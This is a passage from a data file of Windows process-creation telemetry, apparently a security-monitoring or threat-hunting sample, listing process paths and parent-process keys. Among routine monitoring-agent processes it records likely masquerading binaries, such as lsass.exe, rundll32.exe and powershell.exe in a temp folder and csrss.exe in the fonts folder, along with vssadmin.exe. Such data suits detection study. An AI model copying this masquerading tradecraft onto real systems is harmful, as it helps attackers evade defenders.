ell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\vssadmin.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\wuauclt.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\lsass.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\dism.exe\",\"c:\\\\windows\\\\system32\\\\dism.exe\"],\"parent_index\":[\"NaN\",\"363\",\"363\",\"1\",\"363\",\"363\",\"363\",\"363\",\"104\",\"363\",\"363\",\"363\",\"109\",\"363\",\"11\",\"363\",\"363\",\"363\",\"114\",\"363\",\"363\",\"363\",\"119\",\"363\",\"363\",\"363\",\"124\",\"363\",\"363\",\"363\",\"130\",\"363\",\"363\",\"134\",\"363\",\"363\",\"137\",\"363\",\"363\",\"363\",\"363\",\"142\",\"363\",\"363\",\"363\",\"147\",\"363\",\"363\",\"363\",\"363\",\"152\",\"363\",\"363\",\"363\",\"157\",\"363\",\"16\",\"363\",\"363\",\"363\",\"163\",\"363\",\"363\",\"363\",\"363\",\"22\",\"363\",\"363\",\"363\",\"27\",\"363\",\"363\",\"363\",\"33\",\"363\",\"363\",\"339\",\"363\",\"363\",\"363\",\"344\",\"363\",\"363\",\"363\",\"349\",\"363\",\"363\",\"363\",\"354\",\"363\",\"363\",\"363\",\"359\",\"363\",\"363\",\"363\",\"363\",\"39\",\"363\",\"363\",\"363\",\"363\",\"44\",\"363\",\"363\",\"363\",\"363\",\"50\",\"363\",\"363\",\"363\",\"57\",\"363\",\"6\",\"363\",\"363\",\"363\",\"62\",\"363\",\"363\",\"363\",\"67\",\"363\",\"363\",\"363\",\"72\",\"363\",\"363\",\"363\",\"80\",\"363\",\"363\",\"363\",\"363\",\"89\",\"363\",\"363\",\"363\",\"363\",\"94\",\"363\",\"363\",\"363\",\"99\",\"NaN\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"364\",\"NaN\",\"365\",\"365\",\"168\",\"168\",\"168\",\"168\",\"172\",\"168\",\"174\",\"168\",\"168\",\"168\",\"183\",\"168\",\"185\",\"168\",\"187\",\"168\",\"190\",\"168\",\"192\",\"168\",\"194\",\"168\",\"196\",\"168\",\"198\",\"168\",\"199\",\"168\",\"200\",\"168\",\"201\",\"168\",\"206\",\"168\",\"208\",\"168\",\"210\",\"168\",\"212\",\"168\",\"214\",\"168\",\"216\",\"168\",\"218\",\"168\",\"220\",\"168\",\"222\",\"168\",\"224\",\"168\",\"226\",\"168\",\"228\",\"168\",\"230\",\"168\",\"232\",\"168\",\"234\",\"235\",\"235\",\"168\",\"168\",\"168\",\"241\",\"168\",\"168\",\"168\",\"245\",\"168\",\"168\",\"168\",\"168\",\"250\",\"168\",\"252\",\"168\",\"254\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"265\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"272\",\"168\",\"168\",\"275\",\"168\",\"168\",\"278\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"293\",\"168\",\"295\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"305\",\"306\",\"168\",\"308\",\"309\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"168\",\"365\",\"365\",\"365\",\"365\",\"365\",\"NaN\",\"366\",\"366\",\"366\",\"366\",\"NaN\",\"367\",\"77\",\"77\",\"84\",\"NaN\",\"368\",\"176\",\"176\"],\"parent_key\":[\"NaN\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1c4|2019-01-15 04:16:24.007000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1050|2019-01-15 04:52:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x10fc|2019-01-15 04:54:24.003000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x138c|2019-01-15 04:20:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xbe8|2019-01-15 04:56:24.003000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xa84|2019-01-15 04:58:24.013000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x10e0|2019-01-15 05:00:24.003000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xd64|2019-01-15 05:02:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x28c|2019-01-15 05:02:28.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xd64|2019-01-15 05:04:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x690|2019-01-15 05:06:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xb10|2019-01-15 05:08:24.013000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x570|2019-01-15 05:10:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x123c|2019-01-15 05:12:24.007000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x894|2019-01-15 04:22:24.017000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x690|2019-01-15 05:14:24.003000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x11e8|2019-01-15 04:24:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x57c|2019-01-15 04:26:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x107c|2019-01-15 04:28:24.003000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x17fc|2019-01-15 05:16:24.003000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1630|2019-01-15 05:18:24.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1490|2019-01-15 05:20:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1550|2019-01-15 05:22:24.007000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1610|2019-01-15 05:24:24.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x364|2019-01-15 04:30:24.007000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xa08|2019-01-15 04:32:24.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x13e4|2019-01-15 04:34:24.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x11cc|2019-01-15 04:36:24.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x11b0|2019-01-15 04:18:24.003000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x13fc|2019-01-15 04:38:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring 